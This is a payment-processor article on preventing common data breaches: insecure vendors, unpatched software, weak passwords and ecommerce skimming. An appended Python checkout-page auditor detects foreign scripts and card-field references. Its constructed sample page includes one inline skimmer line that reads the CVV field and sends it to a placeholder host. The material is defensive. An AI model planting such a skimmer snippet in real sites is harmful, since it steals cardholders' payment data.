6 minute read

Tips to prevent the four most common data breaches

Tuesday, October 05, 2021

Editor's note: This article was updated on October 5, 2021 from its original publication date of November 13, 2019.

With the dramatic growth of ecommerce, cyber threats are on the rise. According to IBM's Cost of a Data Breach Report 2021, data breaches had the highest average cost in 17 years at $4.24 million per breach. A breach could easily disrupt a business—and even threaten its survival. However, by keeping your eye on security, knowing what vulnerabilities to look for and taking precautionary steps, you can greatly reduce your risk of data breaches.

These are the four most common data breach vulnerabilities that cybercriminals are on the hunt for:

1. Unsecure third-party vendors

One of the most common data breach vulnerabilities, and one that directly affects the security of your business' environment, is the use of unsecure third-party vendors. These vendors often provide payment processing services to businesses, but do not always deliver them securely.

Data thieves have learned that compromising one unsafe vendor gives them a path to several of that vendor's customers, and to those businesses' clients' credit card information. A common example involves vendors using remote access into the customer's processing environment for routine maintenance. Attackers use default passwords, or phishing scams directed at the vendor, to obtain those credentials; with access to the business' environment they deploy malware, and card data is ultimately compromised.

"Ensure you know all of the third-party vendors that are involved with your credit card environment, and know their roles in that environment," advises Stacy Hughes, Chief Information Security Officer at Global Payments. "You should know if those vendors are PCI DSS compliant and if they are implementing their processes securely."

In addition, verify which security functions your payment provider uses, such as encryption, tokenization and 3D Secure, to reduce the risk to your customer data and your exposure to fraud. A well-secured vendor can offer payment security products that protect you and reduce your chance of becoming the victim of a data breach.

2. Security patches

Another common data breach vulnerability involves security patches. In many cases, businesses are not aware that security patches for their firewalls, antivirus software or software platforms are out of date. Software and platform providers regularly release security updates, and applying them keeps software current and protected against data breaches and cyber attacks.

"You should complete every necessary security patch on all systems that are linked to your processing environment," said Hughes. "You can schedule these routinely so you don't have to worry about missing any necessary changes."

3. Weak or stolen passwords

According to Verizon's 2019 Data Breach Investigations Report, 80% of hacking-related activities involve compromised or weak credentials. Typically, weak passwords are default passwords, such as "password," "welcome," or "12345," supplied by third-party vendors. In many cases, account holders forget or fail to change the password a third-party vendor assigned for first-time entry. The end result? Hackers exploit this vulnerability, and a data breach can follow.

"It's imperative that you create unique passwords associated with your computer systems, internet access and payment environment," Hughes says. "Use strong passwords that include at least seven characters with numbers, symbols and letters – at least one capitalised. And change it frequently, preferably every three months."

Stolen passwords are easily obtained by hackers through phishing attacks. Hackers pretend to be a legitimate contact (for example, part of the IT team) and reach out to your employees trying to trick them into providing their password.

"It's crucial to train your employees on how to protect themselves from phishing attacks, as well as on company security policies. For instance, employees should know to never give out their passwords or login credentials and to be suspicious of emails requesting them," Hughes says.

4. Ecommerce vulnerabilities

Card data thieves search websites for a number of vulnerabilities, such as weak or outdated SSL certificates or software platforms. Platforms like Adobe's Magento regularly release security updates so that merchants' software can protect against the latest cyber attacks. However, the individuals responsible for managing an ecommerce implementation often are not aware of these updates, or simply have not taken the necessary steps to apply them, which leaves the site vulnerable to a cyber attack. Cybercriminals can then deploy JavaScript skimmers: they inject malicious JavaScript code into the merchant's website to steal the credit card data.

What's more, cybercriminals are now sophisticated enough to create copies of the merchant's shopping cart or iFrame in order to steal card data, and to the cardholder it appears they are still on the merchant's website when, in fact, they are not.

Any entity that handles credit cards and accepts them as payment is responsible for ensuring they handle all credit card data securely as guided by the Payment Card Industry Data Security Standard (PCI DSS).

To help you stay on top of security, the following due diligence checklist can help:

  • Have your software platforms been patched with all available security updates? Are you running the latest version of the software?
  • Do you know whose responsibility it is to implement updates and patches, yours or the hosted service provider's? The PCI Data Security Standards include a roles and responsibilities breakdown in the appendix. Ensure your shopping cart has the most up-to-date security features when accepting payments over the internet; having a third party such as your payment processor or acquirer maintain or "host" some of these features, including JavaScript or iFrames, can better secure your customers' data.
  • Ensure you're using the most secure SSL/TLS protocol versions, such as TLS 1.2.
  • Always remember the big three elements present in most data breaches:
    • Software updates and patching are baseline controls critical to your security.
    • Password management and strong passwords are essential.
    • Tightly manage and limit administrative access, as well as any remote access to the administrative portal.
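A defensive counterpart to the JavaScript skimmer scenario described above and to the checklist point about hosted JavaScript, added here as an example and not code from the article or from Global Payments: a Python audit that parses a checkout page's HTML, flags external scripts whose origin is not on the merchant's allowlist, and flags inline scripts that reference card fields (which a skimmer must do, and which first-party code need not when the PSP hosts those fields). ALLOWED_ORIGINS, CARD_FIELD_HINTS and SAMPLE_PAGE are constructed, hypothetical values.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_ORIGINS = {"https://cdn.example-psp.test"}  # hypothetical merchant allowlist
# Card-field names a skimmer has to touch. When card fields live in the PSP's
# hosted iframe, first-party inline code has no reason to reference them.
CARD_FIELD_HINTS = ("card_number", "cardnumber", "ccnum", "cvv", "cvc", "expiry")

class ScriptAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # (finding_type, detail) tuples
        self._inline = None  # buffer for the inline script currently being read

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src is None:      # inline script: collect its body until </script>
            self._inline = []
            return
        u = urlparse(src)
        if not u.netloc:     # relative URL is same-origin: accepted
            return
        origin = f"{u.scheme or 'https'}://{u.netloc}"  # also covers //host/x.js
        if origin not in ALLOWED_ORIGINS:
            self.findings.append(("unexpected_origin", origin))

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            body = "".join(self._inline).lower()
            hits = sorted(h for h in CARD_FIELD_HINTS if h in body)
            if hits:
                self.findings.append(("inline_card_field", ",".join(hits)))
            self._inline = None

def audit_checkout_html(html):
    p = ScriptAuditor()
    p.feed(html)
    return p.findings

# Constructed sample: same-origin script, allowed PSP script, an injected
# third-party script, and an inline snippet that reads a card field and sends it off-site.
SAMPLE_PAGE = """<script src="/static/checkout.js"></script>
<script src="https://cdn.example-psp.test/fields.js"></script>
<script src="https://static.injected-example.test/jquery.min.js"></script>
<script>new Image().src = "https://static.injected-example.test/g?d=" + document.querySelector("[name=cvv]").value;</script>"""
```

Running the audit on a saved copy of the live checkout page on a schedule, and diffing the findings against the previous run, turns a one-off check into the kind of routine monitoring the checklist calls for.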

If you discover or have been notified that a compromise or data breach may have occurred, take these steps:

  • Stop processing on the compromised ecommerce environment, at least temporarily. Seek alternative processing methods such as credit card terminals through dial-up.
  • Do not delete anything or attempt to "clean up" any data. Doing so could undermine any investigation that is needed.
  • Customers of Global Payments should notify us immediately.
  • Notify your third-party hosting provider (if applicable).

As you navigate today's new commerce landscape, we're here to help keep your business and your customers safe. To do so, we created the Merchant Protection Program to assist you with securing your processing environment and achieving PCI DSS compliance. Another helpful resource is the PCI SSC Merchants Microsite, which has many useful guides including patching resources to help with outdated software.